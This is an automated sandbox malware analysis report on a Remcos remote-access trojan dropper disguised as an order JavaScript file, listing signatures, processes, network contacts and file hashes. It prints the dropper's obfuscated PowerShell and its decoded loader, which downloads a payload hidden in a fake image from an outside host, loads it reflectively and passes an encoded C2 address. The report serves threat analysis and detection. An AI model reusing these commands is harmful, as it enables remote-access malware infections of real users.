Malware Analysis Report

2025-06-16 01:16

Sample ID 231208-e2wd2shb25
Target 476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95
SHA256 476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95
Tags
remcos remotehost rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95

Threat Level: Known bad

The file 476ccf639c26a23322184963067c8deadc73a4a6aedc518fd1dc9aef4d583f95 was found to be: Known bad.

Malicious Activity Summary

remcos remotehost rat

Remcos

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Script User-Agent

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-08 04:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-08 04:26

Reported

2023-12-08 04:29

Platform

win7-20231130-en

Max time kernel

121s

Max time network

122s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"

Signatures

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚Cs♛♚PQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚LgBM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚C♛♚♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚Ds♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBT♛♚HU♛♚YgBz♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚s♛♚C♛♚♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BM♛♚GU♛♚bgBn♛♚HQ♛♚a♛♚♛♚p♛♚Ds♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚QwBv♛♚G4♛♚dgBl♛♚HI♛♚d♛♚Bd♛♚Do♛♚OgBG♛♚HI♛♚bwBt♛♚EI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bi♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BD♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚Ck♛♚Ow♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚UgBl♛♚GY♛♚b♛♚Bl♛♚GM♛♚d♛♚Bp♛♚G8♛♚bg♛♚u♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQBd♛♚Do♛♚OgBM♛♚G8♛♚YQBk♛♚Cg♛♚J♛♚Bj♛♚G8♛♚bQBt♛♚GE♛♚bgBk♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚p♛♚Ds♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚b♛♚Bv♛♚GE♛♚Z♛♚Bl♛♚GQ♛♚QQBz♛♚HM♛♚ZQBt♛♚GI♛♚b♛♚B5♛♚C4♛♚RwBl♛♚HQ♛♚V♛♚B5♛♚H♛♚♛♚ZQ♛♚o♛♚Cc♛♚QwBs♛♚GE♛♚cwBz♛♚Ew♛♚aQBi♛♚HI♛♚YQBy♛♚Hk♛♚Mw♛♚u♛♚EM♛♚b♛♚Bh♛♚HM♛♚cw♛♚x♛♚Cc♛♚KQ♛♚7♛♚CQ♛♚bQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B0♛♚Hk♛♚c♛♚Bl♛♚C4♛♚RwBl♛♚HQ♛♚TQBl♛♚HQ♛♚a♛♚Bv♛♚GQ♛♚K♛♚♛♚n♛♚FI♛♚dQBu♛♚Cc♛♚KQ♛♚u♛♚Ek♛♚bgB2♛♚G8♛♚awBl♛♚Cg♛♚J♛♚Bu♛♚HU♛♚b♛♚Bs♛♚Cw♛♚I♛♚Bb♛♚G8♛♚YgBq♛♚GU♛♚YwB0♛♚Fs♛♚XQBd♛♚C♛♚♛♚K♛♚♛♚n♛♚GQ♛♚S♛♚Bo♛♚D♛♚♛♚T♛♚Br♛♚E4♛♚TgBV♛♚Gk♛♚OQBu♛♚GM♛♚bgBj♛♚HY♛♚TwBD♛♚DQ♛♚egBO♛♚EM♛♚N♛♚♛♚0♛♚E0♛♚agBJ♛♚HU♛♚TgBq♛♚Fk♛♚dgBM♛♚Ho♛♚c♛♚B3♛♚GQ♛♚S♛♚BS♛♚G8♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZgBk♛♚GY♛♚Z♛♚♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚Zg♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bh♛♚GQ♛♚cwBh♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GU♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GM♛♚dQ♛♚n♛♚Ck♛♚KQ♛♚=';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/683/196/original/dll_js.jpg?1701821835';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('dHh0LkNNUi9ncncvOC4zNC44MjIuNjYvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 uploaddeimagens.com.br udp
US 104.21.45.138:443 uploaddeimagens.com.br tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp

Files

memory/2568-18-0x000000001B710000-0x000000001B9F2000-memory.dmp

memory/2568-19-0x00000000021D0000-0x00000000021D8000-memory.dmp

memory/2568-20-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2568-21-0x0000000002200000-0x0000000002280000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 aba4eb063a707d691f8c75c62243e615
SHA1 6731d5a587b9d5ff7de2a1b168be27da7a21348d
SHA256 dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a
SHA512 70b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc

memory/2568-22-0x0000000002200000-0x0000000002280000-memory.dmp

memory/2568-28-0x0000000002200000-0x0000000002280000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CYBBDJZ73VHGL3XUCA4E.temp

MD5 aba4eb063a707d691f8c75c62243e615
SHA1 6731d5a587b9d5ff7de2a1b168be27da7a21348d
SHA256 dc366bdef846b1240efa211b036acc8b96c9df2b69596fb8d6ab5e8432008c1a
SHA512 70b16dd91322cd742fa8dcd543d3582c83ff71dbf5b3243b069d8f0f0ec59cef26f3e67209d6e36f260479ff7ad24ac9a522a1bbb41f72e79b80cc44aed302fc

memory/2712-29-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2712-30-0x00000000029D0000-0x0000000002A50000-memory.dmp

memory/2712-31-0x00000000029D0000-0x0000000002A50000-memory.dmp

memory/2568-32-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2712-33-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2712-34-0x00000000029D0000-0x0000000002A50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab1130.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b1529796de9598023510a36334ef1147
SHA1 7de26a18848dd6cd4d3a5e8bc3672a1375b0c9e5
SHA256 8e22c9d226a3b50a668e73f906e5477dc3f8b35e7683997b3143d4d5d17b35c0
SHA512 2f28969f68ac5623d4becf5c81e53f385266df25d0a5b1f4a548631e37b2786b2edcb96f607a9d931ab3cd0dfd7745e7783430a27348809f79b58c145f241868

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 cca981a13aca69f997066820eeca8ea9
SHA1 4321c495e20ddce52a1025f0a063d73e9d76eba4
SHA256 7f93db5251ea461433650d3baf1068b4b18946f1086621b06f62b4287a982779
SHA512 968df4b4c6ef6da04afb65d20045d8a3a2b001fbef7df33601b312421030771cd628ce6cc287cbc5cb4cee426c196f934927dd8a78fe3ecd792a11f5c5b48280

C:\Users\Admin\AppData\Local\Temp\Tar1133.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0eca7d4a6954c268072754da3b19b4d8
SHA1 290f048633eee6f1d304e8a75013ab58b0d0ffd8
SHA256 b3436bd9676f0cb52fb3aae5365b06830a8a254c1f3979415863f5b70ac5e71c
SHA512 3c7736dda0f7ccef7769af310e4f993ddb1d81b7356ecfe7f88ed1801621501f1c41484287100894aefa7259df9553003fd4a8178162a3f6daf9718865ac06ee

memory/2712-100-0x0000000002CC0000-0x0000000002CCA000-memory.dmp

memory/2712-101-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2568-102-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-08 04:26

Reported

2023-12-08 04:29

Platform

win10v2004-20231127-en

Max time kernel

149s

Max time network

151s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3028534956-1709433221-1313273668-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4576 set thread context of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1996 wrote to memory of 3240 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1996 wrote to memory of 3240 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3240 wrote to memory of 4576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3240 wrote to memory of 4576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4576 wrote to memory of 744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order NO.Z21239.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚Dg♛♚Mw♛♚v♛♚DE♛♚OQ♛♚2♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚Z♛♚Bs♛♚Gw♛♚XwBq♛♚HM♛♚LgBq♛♚H♛♚♛♚Zw♛♚/♛♚DE♛♚Nw♛♚w♛♚DE♛♚O♛♚♛♚y♛♚DE♛♚O♛♚♛♚z♛♚DU♛♚Jw♛♚7♛♚CQ♛♚dwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚TgBl♛♚Hc♛♚LQBP♛♚GI♛♚agBl♛♚GM♛♚d♛♚♛♚g♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚TgBl♛♚HQ♛♚LgBX♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚EI♛♚eQB0♛♚GU♛♚cw♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C4♛♚R♛♚Bv♛♚Hc♛♚bgBs♛♚G8♛♚YQBk♛♚EQ♛♚YQB0♛♚GE♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBV♛♚HI♛♚b♛♚♛♚p♛♚Ds♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚g♛♚D0♛♚I♛♚Bb♛♚FM♛♚eQBz♛♚HQ♛♚ZQBt♛♚C4♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚EU♛♚bgBj♛♚G8♛♚Z♛♚Bp♛♚G4♛♚ZwBd♛♚Do♛♚OgBV♛♚FQ♛♚Rg♛♚4♛♚C4♛♚RwBl♛♚HQ♛♚UwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBT♛♚FQ♛♚QQBS♛♚FQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚EY♛♚b♛♚Bh♛♚Gc♛♚I♛♚♛♚9♛♚C♛♚♛♚Jw♛♚8♛♚Dw♛♚QgBB♛♚FM♛♚RQ♛♚2♛♚DQ♛♚XwBF♛♚E4♛♚R♛♚♛♚+♛♚D4♛♚Jw♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚EY♛♚b♛♚Bh♛♚Gc♛♚KQ♛♚7♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚TwBm♛♚Cg♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚ZQ♛♚g♛♚D♛♚♛♚I♛♚♛♚t♛♚GE♛♚bgBk♛♚C♛♚♛♚J♛♚Bl♛♚G4♛♚Z♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚t♛♚Gc♛♚d♛♚♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bg